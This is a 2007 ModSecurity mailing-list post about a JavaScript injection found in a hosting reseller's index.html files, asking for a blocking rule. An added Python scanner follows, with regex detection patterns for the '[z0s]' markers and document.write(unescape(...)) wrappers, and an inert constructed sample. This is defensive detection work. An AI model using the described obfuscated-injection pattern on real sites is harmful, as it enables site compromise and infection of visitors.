[Modsecurity] Some type of file injection vuln going around
admin at efastservers.com
Mon Oct 8 12:48:33 EDT 2007
One of my resellers contacted me today stating that one of his websites was
hacked and possibly the server. He wanted to know what we were going to do
about it.
I checked the server but no other website is affected except for two of his
own websites.
There seems to be some type of javascript file injection vuln going around.
I searched the logs but could not find anything obvious in his logs. I
checked all sites and they are clean.
Here is what was injected into his index.html file after the <header> tag.
There is a small discussion about this at
http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23
Is there a mod_sec rule that can stop this?
Thanks
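A file-side detection pass for the injection pattern described in the post, added here as an example and not part of the original message or of ModSecurity: it scans HTML files for the `<!--[z0s]-->` markers, for `document.write(unescape("..."))` wrappers (decoding the first percent-encoding layer so an analyst can see the nested `<script>`), and for markup appended after the closing `</html>` tag. The sample page is constructed; this complements a mod_security rule on inbound requests rather than replacing it.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Patterns taken from the injected block quoted on the list: the [z0s] comment
# markers and the document.write(unescape("...")) wrapper. Mail wrapping split
# the quoted sample mid-token, so line breaks are stripped before matching.
MARKER_RE = re.compile(r"<!--\[z0s\]-->(.*?)<!--\[/z0s\]-->", re.S)
WRITE_UNESCAPE_RE = re.compile(
    r'document\s*\.\s*write\s*\(\s*unescape\s*\(\s*"([^"]*)"\s*\)\s*\)', re.I)
SCRIPT_RE = re.compile(r"<script", re.I)


def scan_html(page: str) -> list:
    """Return findings for one HTML document: marker-delimited blocks,
    unescape-wrapped document.write payloads (first layer decoded) and any
    content that follows the closing </html> tag."""
    text = page.replace("\r", "").replace("\n", "")
    findings = []
    for m in MARKER_RE.finditer(text):
        findings.append({"kind": "z0s-marker", "body": m.group(1)})
    for m in WRITE_UNESCAPE_RE.finditer(text):
        decoded = unquote(m.group(1))  # undo one layer of %XX encoding
        findings.append({"kind": "write-unescape", "decoded": decoded,
                         "nested_script": bool(SCRIPT_RE.search(decoded))})
    _head, sep, tail = text.partition("</html>")
    if sep and tail.strip():
        findings.append({"kind": "after-html", "body": tail.strip()})
    return findings


def scan_tree(root: str) -> dict:
    """Walk a web root and map each file with findings to its finding list."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".html", ".htm", ".php"}:
            found = scan_html(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


# Constructed sample (not the real payload): a clean page with an appended
# block shaped like the one reported, including a mail-style line break.
SAMPLE = ('<html><head><title>Shop</title></head><body>Welcome</body></html>\n'
          '<!--[z0s]--><script>docu\nment.write(unescape('
          '"%3Cscript%3Evar%20wA%3D1%3C/script%3E"))</script><!--[/z0s]-->')

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```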